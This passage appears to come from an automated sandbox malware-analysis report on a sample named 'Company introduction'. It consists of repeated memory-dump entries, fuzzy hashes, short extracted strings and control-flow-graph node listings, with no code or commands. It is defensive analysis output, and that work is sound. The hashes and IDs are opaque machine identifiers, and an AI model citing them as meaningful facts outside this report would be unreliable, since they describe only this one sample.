                                                                                                                                                    • Instruction ID: 2a94c3ac398ccfcb44a2d5308fc51b4e27be93d8e5dc81d8e6f50e43601500cc
                                                                                                                                                    • Opcode Fuzzy Hash: 5e9d151cfca1c09eec47797eb029cc573eddc6156713679bebd9a6d10291a228
                                                                                                                                                    • Instruction Fuzzy Hash: 40B12AB1E15219DFDB18CFA6D98099EFBB2FF99300F10D52AD425AB264DB349902CF50
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ]]o
                                                                                                                                                    • API String ID: 0-2636374853
                                                                                                                                                    • Opcode ID: 8629a45e3d4dcb319d2afa69d0544d7ff09e1c9cc70040087e0d9829d03bfb4f
                                                                                                                                                    • Instruction ID: 6cee6615450609396bfdf8a55f7393cbb0aaa4f058f2c9b4146200fb51dae257
                                                                                                                                                    • Opcode Fuzzy Hash: 8629a45e3d4dcb319d2afa69d0544d7ff09e1c9cc70040087e0d9829d03bfb4f
                                                                                                                                                    • Instruction Fuzzy Hash: F17139B4E1520A9FCB04CFA9D4809EFFBB6FF89310F248166D515AB215D3749A41CFA1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ]]o
                                                                                                                                                    • API String ID: 0-2636374853
                                                                                                                                                    • Opcode ID: 4b31463a28a264c401722b3524a9fd5a2c4effe4b5dee128cca2c4dbf38bebe9
                                                                                                                                                    • Instruction ID: 23ee4d58c76bfc5d38a5e8261315d1b2dfb95221abe241ce33f4d983f9670ebb
                                                                                                                                                    • Opcode Fuzzy Hash: 4b31463a28a264c401722b3524a9fd5a2c4effe4b5dee128cca2c4dbf38bebe9
                                                                                                                                                    • Instruction Fuzzy Hash: 307117B4E1120ADFCB04CFA9D5809AFFBB6FB89310F24812AD515A7315D3749A81CFA4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: .dlk
                                                                                                                                                    • API String ID: 0-1029699734
                                                                                                                                                    • Opcode ID: 904fa18f0c68acc7b2b8bde8b53ef7d727d828682644521e36f1fdd62063211f
                                                                                                                                                    • Instruction ID: 6704dc90563e3b4ce99dde7be4988a305b7a42f9c46c343c8d10183554ae63bd
                                                                                                                                                    • Opcode Fuzzy Hash: 904fa18f0c68acc7b2b8bde8b53ef7d727d828682644521e36f1fdd62063211f
                                                                                                                                                    • Instruction Fuzzy Hash: 59510EB5E002198FDB14CFAAD5805AEFBF6FF89304F24C16AD418A7216D7355A41CF61
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: i#)6
                                                                                                                                                    • API String ID: 0-3600651614
                                                                                                                                                    • Opcode ID: ecec51caf8a963e0940835d3843e0c685b386733537ea9c7a38da7286c1a257e
                                                                                                                                                    • Instruction ID: 919337c2a65db318e07a7fb41c605df7689b2e2270ff584f8b97d3bb6b92c702
                                                                                                                                                    • Opcode Fuzzy Hash: ecec51caf8a963e0940835d3843e0c685b386733537ea9c7a38da7286c1a257e
                                                                                                                                                    • Instruction Fuzzy Hash: 69411DB0D1524A8FCB04CFE6C5416AEFBF5AF8A200F14946AD115AB254D3389B458F95
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: i#)6
                                                                                                                                                    • API String ID: 0-3600651614
                                                                                                                                                    • Opcode ID: f9fdef31568bf42ca91588c7f78bcac2f4260bd982fd68c2c87bfca9d84da068
                                                                                                                                                    • Instruction ID: bf31d89a13908c1584d2ba3fa7bd0c0af0cd0ea98af89aee62e9a99eb372381e
                                                                                                                                                    • Opcode Fuzzy Hash: f9fdef31568bf42ca91588c7f78bcac2f4260bd982fd68c2c87bfca9d84da068
                                                                                                                                                    • Instruction Fuzzy Hash: 8A410CB0E1520ADBCB44DFE6C5416AEFBF9EF8A300F10D42AD125AB254D33897458F95
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1481d92f165d61ba4d3f2cb7c25a3308d86a4b60abe4370e16666cb74e755a2d
                                                                                                                                                    • Instruction ID: e67943f62466cc9b062f6c39eafc823d0dd8817d214e469c044fd50f876f7509
                                                                                                                                                    • Opcode Fuzzy Hash: 1481d92f165d61ba4d3f2cb7c25a3308d86a4b60abe4370e16666cb74e755a2d
                                                                                                                                                    • Instruction Fuzzy Hash: ABE1F7B4E001198FCB14CFA9D5809AEBBF6FF89304F248169E414AB356D735AD81CFA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 71fb0371c599ab632070b489fa3d02eca79ee00db73bf296cb06b13df31c0c29
                                                                                                                                                    • Instruction ID: 67625dc254f8b4e183b36f11a590d1ff068f8f99decb16b35b310b77debf966f
                                                                                                                                                    • Opcode Fuzzy Hash: 71fb0371c599ab632070b489fa3d02eca79ee00db73bf296cb06b13df31c0c29
                                                                                                                                                    • Instruction Fuzzy Hash: 82E1E6B4E001198FCB14DFA9D5809AEFBB6FF89305F249169E424AB356D734AD81CF60
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1e11be5ff252f6610491d70edfb1bda7c834e062050c1828721290db5b2d19fe
                                                                                                                                                    • Instruction ID: ddd3d772d647e60b1c2d4917c39b4813f75d77064ff5b03489c4b21221139c2b
                                                                                                                                                    • Opcode Fuzzy Hash: 1e11be5ff252f6610491d70edfb1bda7c834e062050c1828721290db5b2d19fe
                                                                                                                                                    • Instruction Fuzzy Hash: 2FE1F5B4E0421A8FDB14CFA9D5809AEBBF6FF89304F249169D414AB356D734AD81CF60
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1739483945.0000000007E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E90000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_7e90000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4876339e3ba0d4d68ec4cd00803e54cfd4453f0c8806d2bbde85ca48c25a9464
                                                                                                                                                    • Instruction ID: f497993b203af5c0f111c8313bd041db1ccceccfd4dd842db023f8f07e2d4560
• Opcode Fuzzy Hash: 4876339e3ba0d4d68ec4cd00803e54cfd4453f0c8806d2bbde85ca48c25a9464
• Instruction Fuzzy Hash: ACE1D8B5E0121ACFCB14CFA9D5809AEBBF2FF89304F249169D414AB356D734A981CF61
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e2164df82cccbf4469e6439c7c5a3b1eb957953f30f45f8c46acbe7ab9e0d4f9
• Instruction ID: a196b2e568078d91a3c23072da397e2cab8daf05c390b1be2ae6243f4babcec8
• Opcode Fuzzy Hash: e2164df82cccbf4469e6439c7c5a3b1eb957953f30f45f8c46acbe7ab9e0d4f9
• Instruction Fuzzy Hash: 0761F5B4E152099FCF08CFA9C5809EEFBF6EF89210F24946AD415FB264D7349A41CB64
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d43f7e84e1dafeccc8ca946351f5289919c531ea1c761b5bd5c293b89999b2ce
• Instruction ID: 58994a991cafd5ad8375e79518cb15ec2c5026d11ab0cd22f674ffe1b2b323b2
• Opcode Fuzzy Hash: d43f7e84e1dafeccc8ca946351f5289919c531ea1c761b5bd5c293b89999b2ce
• Instruction Fuzzy Hash: 3271D2B4E152099FCF08CFA9C5809EEFBF6FF89210F24942AD415BB264D7349A418B64
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 311106c27bae66e07889ba268cd454baa763fa32dd840b6ccbd57bb36825e04d
• Instruction ID: f3fd489e1f337a0ca73b75994be699b30a6e0cb9f77a965af993647ca385e631
• Opcode Fuzzy Hash: 311106c27bae66e07889ba268cd454baa763fa32dd840b6ccbd57bb36825e04d
• Instruction Fuzzy Hash: 8E514AB1D1525ACFCF04CFA6D4401EEFBBAAF8E601F14946AE425B7214D3389606CF55
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0b5889d2a4bf357daf4cb1bf3be25673e3401e079fad38e172e45c33db298825
• Instruction ID: 9183b5f3d7739f833493e37ef14a649ca067ada960dc8c0db3a600b091f2f48f
• Opcode Fuzzy Hash: 0b5889d2a4bf357daf4cb1bf3be25673e3401e079fad38e172e45c33db298825
• Instruction Fuzzy Hash: 765107B5D15219CFCF04CFA6E4405EEFBFAEB8D601F10942AE425B6214D3789A058F69
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7eeaa5d3aa08ff6290560336525408de59bd271412f416795a6e7a2a307f7bc8
• Instruction ID: d45f26e7619a30bb2d0f492b5d77c16f67eea88120567a81e8838dcb13313c7c
• Opcode Fuzzy Hash: 7eeaa5d3aa08ff6290560336525408de59bd271412f416795a6e7a2a307f7bc8
• Instruction Fuzzy Hash: 1F4108B0D1560A9FCF44CFAAC5816AEFBF2BF89300F24D06AC425AB254E7359A41CF55
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ab5ce18f1dc7c1c51b1aa6287895f329b10d45e4e008cdda3ffc1bc6136b9b4b
• Instruction ID: c1f40b92a1f9fbe5c026bf424b64839034c70f96099e387bd2ee6651200e301c
• Opcode Fuzzy Hash: ab5ce18f1dc7c1c51b1aa6287895f329b10d45e4e008cdda3ffc1bc6136b9b4b
• Instruction Fuzzy Hash: 52417CB0E1160ADFCB04CFA9C581AAEFBBAFF85300F24D595C425A7255E7349A81CB91
Memory Dump Source
• Source File: 00000000.00000002.1739297841.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ae0000_Company introduction.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7efc64c05895ecadf82cdaae0d522ea958a287632d6844cd87d71837b1e0127f
• Instruction ID: 87fd2bfc983b7898279d9b25b196a4c175f8818fdb5b10cca6ba2e934c5ce278
• Opcode Fuzzy Hash: 7efc64c05895ecadf82cdaae0d522ea958a287632d6844cd87d71837b1e0127f
• Instruction Fuzzy Hash: D94108B0D1160A9BCF44CFAAC5815AEFBF6BB89300F20D06AC425BB354E7359A41CF95

Execution Graph

Execution Coverage: 14.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 85.7%
Total number of Nodes: 7
Total number of Limit Nodes: 1

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
Similarity
• API ID:
• String ID: (o^q$(o^q$(o^q$,bq$,bq
• API String ID: 0-2525668591
• Opcode ID: 524545fdd08b3fa7068de3fb23205228b2af7d69711d06c39219fe4013a7fbe0
• Instruction ID: 5fb886143d32d5297ccd50ed662be5c88a4efcca5dc913a5f4c2cfd9ce170911
• Opcode Fuzzy Hash: 524545fdd08b3fa7068de3fb23205228b2af7d69711d06c39219fe4013a7fbe0
• Instruction Fuzzy Hash: 4E125F30A00259DFDB19CF69C884AAEFBF2BF48358F658469E905AB361D731DC41CB51
Strings
Memory Dump Source
• Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
Similarity
• API ID:
• String ID: (o^q$4'^q$4'^q$4'^q
• API String ID: 0-183542557
• Opcode ID: 76d0c89124112eaeec74bd465b876a5116c37c2bbc43889d8d46b97df1b09ee3
• Instruction ID: f66ffc577e5f080b3570aa212c0d90470d0dde2c502e990ce9331d3a8dc9f7b5
• Opcode Fuzzy Hash: 76d0c89124112eaeec74bd465b876a5116c37c2bbc43889d8d46b97df1b09ee3
• Instruction Fuzzy Hash: 2CA27D31A00209CFCB15CF68C984AAEFBB2FF88314F1985A9E505DB2A6D735ED41CB51

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000006.00000002.2955296568.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5a80000_Company introduction.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 0516938894b95ea053629be444366e1b66304cda05c7eb921a75e86980c4d003
• Instruction ID: 9edd3e503f1a7c34facf3e4a31950f5eee73243b43b0e348a680861b22efe886
• Opcode Fuzzy Hash: 0516938894b95ea053629be444366e1b66304cda05c7eb921a75e86980c4d003
• Instruction Fuzzy Hash: 41F1D574E01218DFDB14DFA9D884BAEBBB2BF88304F14C1A9E408AB355DB759985CF50
Strings
Memory Dump Source
• Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
Similarity
• API ID:
• String ID: (o^q$Hbq
• API String ID: 0-662517225
• Opcode ID: c026ba43334fa46191fca1f10a2aab7fc7ce9c62075e92511d6cec0ddd556ca3
• Instruction ID: 2c31312567d7d3691a310d11baaa8d54c099e566f191c471ba1272b571543f76
• Opcode Fuzzy Hash: c026ba43334fa46191fca1f10a2aab7fc7ce9c62075e92511d6cec0ddd556ca3
                                                                                                                                                    • Instruction Fuzzy Hash: 4F128E70A0021D8FDB19DF69C854AAEBBF6FF88304F148569E545EB395DB309D82CB90

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2247 17d3b85-17d3b8e 2248 17d3b91-17d3b94 2247->2248 2249 17d3b90 2247->2249 2250 17d3b99 2248->2250 2251 17d3b98 2248->2251 2249->2248 2252 17d3b9d-17d3be5 2250->2252 2253 17d3b9c 2250->2253 2251->2250 2251->2252 2254 17d3be9-17d3bee 2252->2254 2255 17d3be8 2252->2255 2253->2252 2256 17d3bf1 2254->2256 2257 17d3bf0 2254->2257 2255->2254 2258 17d3bf5 2256->2258 2259 17d3bf4 2256->2259 2257->2256 2257->2258 2260 17d3bf9 2258->2260 2261 17d3bf8 2258->2261 2259->2258 2259->2260 2262 17d3bfd 2260->2262 2263 17d3bfc 2260->2263 2261->2260 2261->2262 2264 17d3c01 2262->2264 2265 17d3c00 2262->2265 2263->2262 2263->2264 2266 17d3c05 2264->2266 2267 17d3c04 2264->2267 2265->2264 2265->2266 2268 17d3c09 2266->2268 2269 17d3c08 2266->2269 2267->2266 2267->2268 2270 17d3c0d 2268->2270 2271 17d3c0c 2268->2271 2269->2268 2269->2270 2272 17d3c11 2270->2272 2273 17d3c10 2270->2273 2271->2270 2271->2272 2274 17d3c15 2272->2274 2275 17d3c14 2272->2275 2273->2272 2273->2274 2276 17d3c19 2274->2276 2277 17d3c18 2274->2277 2275->2274 2275->2276 2278 17d3c1d 2276->2278 2279 17d3c1c 2276->2279 2277->2276 2277->2278 2280 17d3c21 2278->2280 2281 17d3c20 2278->2281 2279->2278 2279->2280 2282 17d3c25 2280->2282 2283 17d3c24 2280->2283 2281->2280 2281->2282 2284 17d3c29 2282->2284 2285 17d3c28 2282->2285 2283->2282 2283->2284 2286 17d3c2d 2284->2286 2287 17d3c2c 2284->2287 2285->2284 2285->2286 2288 17d3c31 2286->2288 2289 17d3c30 2286->2289 2287->2286 2287->2288 2290 17d3c35 2288->2290 2291 17d3c34 2288->2291 2289->2288 2289->2290 2292 17d3c39-17d3c3c 2290->2292 2293 17d3c38 2290->2293 2291->2290 2291->2292 2294 17d3c3d 2292->2294 2295 17d3c41-17d3c44 2292->2295 2293->2292 2294->2295 2296 17d3c40 2294->2296 2297 17d3c7b-17d3c7c 2295->2297 2298 17d3c45-17d3c46 2295->2298 2296->2295 2299 17d3c7d 2297->2299 2300 17d3c81-17d3ca4 
2297->2300 2301 17d3c49-17d3c4a 2298->2301 2302 17d3c48 2298->2302 2299->2300 2303 17d3c7f-17d3c80 2299->2303 2312 17d3c69-17d3c6a 2300->2312 2313 17d3ca6-17d3cd9 2300->2313 2305 17d3c4d-17d3c4e 2301->2305 2306 17d3c4c 2301->2306 2302->2301 2303->2300 2308 17d3c51-17d3c52 2305->2308 2309 17d3c50 2305->2309 2306->2305 2310 17d3c55-17d3c56 2308->2310 2311 17d3c54 2308->2311 2309->2308 2314 17d3c59-17d3c5a 2310->2314 2315 17d3c58 2310->2315 2311->2310 2316 17d3c6d-17d3c6e 2312->2316 2317 17d3c6c 2312->2317 2327 17d3cdb-17d3cdd 2313->2327 2328 17d3cea-17d3cf2 2313->2328 2318 17d3c5d-17d3c5e 2314->2318 2319 17d3c5c 2314->2319 2315->2314 2321 17d3c71-17d3c72 2316->2321 2322 17d3c70 2316->2322 2317->2316 2325 17d3c61-17d3c62 2318->2325 2326 17d3c60 2318->2326 2319->2318 2323 17d3c75-17d3c76 2321->2323 2324 17d3c74 2321->2324 2322->2321 2331 17d3c79 2323->2331 2332 17d3c78 2323->2332 2324->2323 2333 17d3c65-17d3c66 2325->2333 2334 17d3c64 2325->2334 2326->2325 2329 17d3cdf-17d3ce1 2327->2329 2330 17d3ce3-17d3ce8 2327->2330 2335 17d3cf4-17d3d02 2328->2335 2329->2335 2330->2335 2331->2299 2337 17d3c7a 2331->2337 2332->2331 2333->2312 2338 17d3c68 2333->2338 2334->2333 2340 17d3d18-17d3d20 2335->2340 2341 17d3d04-17d3d06 2335->2341 2337->2297 2337->2299 2338->2312 2344 17d3d23-17d3d26 2340->2344 2342 17d3d0f-17d3d16 2341->2342 2343 17d3d08-17d3d0d 2341->2343 2342->2344 2343->2344 2346 17d3d3d-17d3d41 2344->2346 2347 17d3d28-17d3d36 2344->2347 2348 17d3d5a-17d3d5d 2346->2348 2349 17d3d43-17d3d51 2346->2349 2347->2346 2353 17d3d38 2347->2353 2351 17d3d5f-17d3d63 2348->2351 2352 17d3d65-17d3d9a 2348->2352 2349->2348 2358 17d3d53 2349->2358 2351->2352 2355 17d3d9c-17d3db3 2351->2355 2360 17d3dfc-17d3e01 2352->2360 2353->2346 2356 17d3db9-17d3dc5 2355->2356 2357 17d3db5-17d3db7 2355->2357 2361 17d3dcf-17d3dd9 2356->2361 2362 17d3dc7-17d3dcd 2356->2362 2357->2360 2358->2348 2363 17d3de1 2361->2363 2364 17d3ddb 2361->2364 2362->2363 2367 17d3de9-17d3df5 2363->2367 2364->2363 
2367->2360
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Xbq$Xbq
                                                                                                                                                    • API String ID: 0-1243427068
                                                                                                                                                    • Opcode ID: 1cb13bdcf6a3c4ae84a5d19d4006d833f32f81c18e61a995807f8febcc70cd54
                                                                                                                                                    • Instruction ID: 73ffd8c1d62db7b3392dee4eccdf47c4267aef764d5c50c38f47e5dfd5a73d58
                                                                                                                                                    • Opcode Fuzzy Hash: 1cb13bdcf6a3c4ae84a5d19d4006d833f32f81c18e61a995807f8febcc70cd54
                                                                                                                                                    • Instruction Fuzzy Hash: A3814AEA605E9F47CF07863AA84C635FBF97B42160B84446AC44EDB2CBC925C843D753

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2370 17d29ec-17d29f6 2372 17d29f8-17d2a01 2370->2372 2373 17d2981-17d298a 2370->2373 2374 17d2990 2372->2374 2375 17d2a03-17d2a0c 2372->2375 2373->2374 2378 17d2997 2374->2378 2376 17d2a0e-17d38b8 2375->2376 2377 17d2999 2375->2377 2481 17d38bd-17d38ca 2376->2481 2482 17d38bc 2376->2482 2379 17d29a0-17d29c8 2377->2379 2378->2377 2486 17d38cd-17d38d1 2481->2486 2487 17d38cc 2481->2487 2482->2481 2483 17d38ee-17d3962 2482->2483 2496 17d3965-17d3980 2483->2496 2497 17d3964 2483->2497 2486->2483 2487->2486 2497->2496
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Xbq$Xbq
                                                                                                                                                    • API String ID: 0-1243427068
                                                                                                                                                    • Opcode ID: 032aac4e5e48cd46215e2aa0bf2d74c6bd243bf618c911b1a27c7cbc98fe8c50
                                                                                                                                                    • Instruction ID: 9dcb8a70f98c3b668414657ff202e311bbf9617e1e59d596dbb4663950db7a87
                                                                                                                                                    • Opcode Fuzzy Hash: 032aac4e5e48cd46215e2aa0bf2d74c6bd243bf618c911b1a27c7cbc98fe8c50
                                                                                                                                                    • Instruction Fuzzy Hash: CC81ADEC548E8F8ACF438E38849D1B9FFFA7B42130B16819AD9549B11FD5298607C763

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2580 17dc146-17dc158 2581 17dc15a-17dc172 2580->2581 2582 17dc184 2580->2582 2586 17dc17b-17dc17e 2581->2586 2587 17dc174-17dc179 2581->2587 2583 17dc186-17dc18a 2582->2583 2588 17dc18b-17dc199 2586->2588 2589 17dc180-17dc182 2586->2589 2587->2583 2591 17dc19d 2588->2591 2592 17dc19b 2588->2592 2589->2581 2589->2582 2593 17dc19f 2591->2593 2594 17dc1a1 2591->2594 2592->2591 2593->2594 2595 17dc1a5-17dc1c8 2594->2595 2596 17dc1a3 2594->2596 2597 17dc1cf-17dc2ac call 17d41a0 call 17d3cc0 2595->2597 2598 17dc1ca 2595->2598 2596->2595 2608 17dc2ae 2597->2608 2609 17dc2b3-17dc2d4 call 17d5658 2597->2609 2598->2597 2608->2609 2611 17dc2d9-17dc2e4 2609->2611 2612 17dc2eb-17dc2ef 2611->2612 2613 17dc2e6 2611->2613 2614 17dc2f4-17dc2fb 2612->2614 2615 17dc2f1-17dc2f2 2612->2615 2613->2612 2617 17dc2fd 2614->2617 2618 17dc302-17dc310 2614->2618 2616 17dc313-17dc357 2615->2616 2622 17dc3bd-17dc3d4 2616->2622 2617->2618 2618->2616 2624 17dc359-17dc36f 2622->2624 2625 17dc3d6-17dc3fb 2622->2625 2629 17dc399 2624->2629 2630 17dc371-17dc37d 2624->2630 2631 17dc3fd-17dc412 2625->2631 2632 17dc413 2625->2632 2635 17dc39f-17dc3bc 2629->2635 2633 17dc37f-17dc385 2630->2633 2634 17dc387-17dc38d 2630->2634 2631->2632 2636 17dc397 2633->2636 2634->2636 2635->2622 2636->2635
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 541fad26ebd33ca8e030f52c46f2d44e8b676bdab307563a03c3d3f57ee675a3
                                                                                                                                                    • Instruction ID: 701360afaf762144f40c99cf3649ec6575bffec01875bd3ced20a61a306e3417
                                                                                                                                                    • Opcode Fuzzy Hash: 541fad26ebd33ca8e030f52c46f2d44e8b676bdab307563a03c3d3f57ee675a3
                                                                                                                                                    • Instruction Fuzzy Hash: 1EA1D774E00218CFDB15CFAAD984A9DFBF2BF89310F1480A9E419AB365DB319945CF51

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
